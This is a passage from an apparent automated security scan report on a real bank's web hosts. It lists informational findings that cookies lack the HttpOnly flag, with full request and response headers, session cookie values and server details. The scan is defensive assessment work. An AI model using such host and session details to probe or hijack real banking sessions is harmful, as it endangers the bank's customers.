User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 17051
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:01 GMT

function DcsInit() {
this.dcsid = "dcs4b71fc10000gs8u88h5t1k_6n2i";
this.domain = "statse.webtrendslive.com";
this.enabled = true;
this.exre = (function() {
if (window.Reg
...[SNIP]...

8.53. https://secureapps.regions.com/oao/styles/main.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/styles/main.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/styles/main.css HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 10689
Content-Type: text/css
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:18:57 GMT


img{border:none; padding:0px; margin:0px;}

body {background: #fff; font-family: Arial; color: #444; font-size: 1em; margin:0; padding: 0;}

A:link {color: #580; text-decoration: none;}
A:activ
...[SNIP]...

8.54. https://secureapps.regions.com/oao/styles/thickbox.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/styles/thickbox.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/styles/thickbox.css HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=x2zf2a45rab0i245f4jzczva

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 4016
Content-Type: text/css
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:18:55 GMT

/* ----------------------------------------------------------------------------------------------------------------*/
/* ---------->>> global settings needed for thickbox <<<-------------------------
...[SNIP]...

8.55. https://securebank.regions.com/SystemUnavailable.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /SystemUnavailable.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SystemUnavailable.aspx?ResultCode=VALIDATIONERROR HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: securebank.regions.com-https=